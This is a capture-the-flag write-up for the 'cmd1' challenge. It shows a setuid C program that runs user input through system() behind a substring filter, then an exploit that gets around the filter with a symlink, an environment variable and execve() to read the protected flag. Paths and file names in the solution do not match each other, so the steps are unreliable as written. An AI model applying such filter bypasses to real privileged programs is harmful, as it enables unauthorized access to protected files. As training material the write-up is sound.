- cmd1

0x00 Puzzle

Mommy! what is PATH environment in Linux?

ssh -p2222 (pw:guest)  

0x01 Explore


cmd1@ubuntu:~$ ls -l  
total 20  
-r-xr-sr-x 1 root cmd1_pwn 8513 Jul 14  2015 cmd1
-rw-r--r-- 1 root root      319 Jul 14  2015 cmd1.c
-r--r----- 1 root cmd1_pwn   48 Jul 14  2015 flag


#include <stdio.h>
#include <string.h>

int filter(char* cmd){  
        int r=0;
        r += strstr(cmd, "flag")!=0;
        r += strstr(cmd, "sh")!=0;
        r += strstr(cmd, "tmp")!=0;
        return r;
int main(int argc, char* argv[], char** envp){  
        if(filter(argv[1])) return 0;
        system( argv[1] );
        return 0;

0x02 Solution

  • ln -s ~/flag /tmp/flag can bypass the 'flag' checking.

  • Add fp=/tmp/flag to environment can bypass the 'tmp' checking.

  • Using /bin/cat rather than /bin/bash or /bin/sh can bypass the 'sh' checking.


#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(){  
    char *argv[2];
    char *envp[2] = {"fp=/tmp/cmdxhyu/f"};
    argv[0]="a"; // whatever
    argv[1]="/bin/cat $fp";
    execve("./cmd1", argv, envp);
    return 0;
cmd1@ubuntu:/tmp$ ln -s ~/flag /tmp/flag  
cmd1@ubuntu:/tmp$ ln -s ~/cmd1 /tmp/cmd1  
cmd1@ubuntu:/tmp$ gcc -o xpl xpl.c  
cmd1@ubuntu:/tmp$ ./x  
mommy now I get what PATH environment is for :)